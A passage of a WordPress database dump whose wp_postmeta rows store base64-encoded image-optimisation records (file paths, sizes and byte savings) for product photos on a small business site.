SI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3ODIwLCJpZCI6MzY0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzgyMywiaWQiOjM2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTg3LCJ0aW1lIjoxNDgzNTg3ODI1LCJpZCI6MzY0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMTQsInRpbWUiOjE0ODM1ODc4MjgsImlkIjozNjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4MzAsImlkIjozNjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4MzMsImlkIjozNjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4MzUsImlkIjozNjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4MzgsImlkIjozNjR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30251, 363, 'wpfc_optimisation_reduction', '18157'); 
INSERT INTO `wp_postmeta` VALUES (30252, 363, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUuanBnIiwid2lkdGgiOjI5ODgsImhlaWdodCI6MzI0NCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUuanBnIiwicmVkdWN0aW9uIjoxODA0NSwidGltZSI6MTQ4MzU4Nzg0OSwiaWQiOiIzNjMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Nzg1MiwiaWQiOjM2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTczN3g4MDAuanBnIiwid2lkdGgiOjczNywiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS03Mzd4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtNzM3eDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4NTUsImlkIjozNjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS03Njh4ODM0LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6ODM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtNzY4eDgzNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTc2OHg4MzQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3ODU4LCJpZCI6MzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtMTQ3NHgxNjAwLmpwZyIsIndpZHRoIjoxNDc0LCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0xNDc0eDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0xNDc0eDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3ODYyLCJpZCI6MzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Nzg2NCwiaWQiOjM2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4NjcsImlkIjozNjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3ODcwLCJpZCI6MzYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Nzg3MiwiaWQiOjM2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6OTksInRpbWUiOjE0ODM1ODc4NzUsImlkIjozNjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4NzcsImlkIjozNjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4ODAsImlkIjozNjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4ODIsImlkIjozNjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4ODUsImlkIjozNjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8xLW96LURyb3BwZXItQm90dGxlLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMS1vei1Ecm9wcGVyLUJvdHRsZS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzEtb3otRHJvcHBlci1Cb3R0bGUtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4ODgsImlkIjozNjN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30253, 311, 'wpfc_optimisation_reduction', '10226'); 
INSERT INTO `wp_postmeta` VALUES (30254, 311, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAuanBnIiwid2lkdGgiOjQyNTYsImhlaWdodCI6MjgzMiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4Nzg5MywiaWQiOiIzMTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTY1LCJ0aW1lIjoxNDgzNTg3ODk2LCJpZCI6MzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtODAweDUzMi5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTgwMHg1MzIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC04MDB4NTMyLmpwZyIsInJlZHVjdGlvbiI6NzY1LCJ0aW1lIjoxNDgzNTg3OTAwLCJpZCI6MzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtNzY4eDUxMS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTc2OHg1MTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC03Njh4NTExLmpwZyIsInJlZHVjdGlvbiI6NzQyLCJ0aW1lIjoxND